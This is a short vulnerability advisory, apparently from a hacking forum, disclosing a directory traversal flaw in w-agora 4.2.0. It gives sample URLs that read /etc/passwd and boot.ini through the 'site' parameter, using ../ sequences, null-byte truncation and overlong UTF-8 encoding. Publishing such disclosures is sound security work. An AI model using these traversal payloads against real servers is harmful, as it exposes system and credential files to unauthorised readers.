w-agora 4.2.0 and prior Remote Directory Travel Vulnerability
w-agora 4.2.0 and prior Remote Directory Travel Vulnerability
SEVERITY:
=========
High
SOFTWARE:
=========
w-agora 4.2.0
http://w-agora.net
INFO:
=====
w-agora is a web publishing and forum software. It allows you and your visitors
to store and display messages, files, share
discussions and other information on your web site.
DESCRIPTION:
============
W-agora 4.2.0 and earlier are vulnerable to a remote directory travel bug.
Here are some examples:
http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini%00
http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd%00
http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd
http://localhost/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%
c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini
A proof of concept video supporting this issue can be downloaded from here -
http://rapidshare.de/files/4106113/probe.rar.html
VENDOR STATUS
=============
Vendor was contacted but no response received till date.
CREDITS:
========
This vulnerability was discovered and researched by -
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2097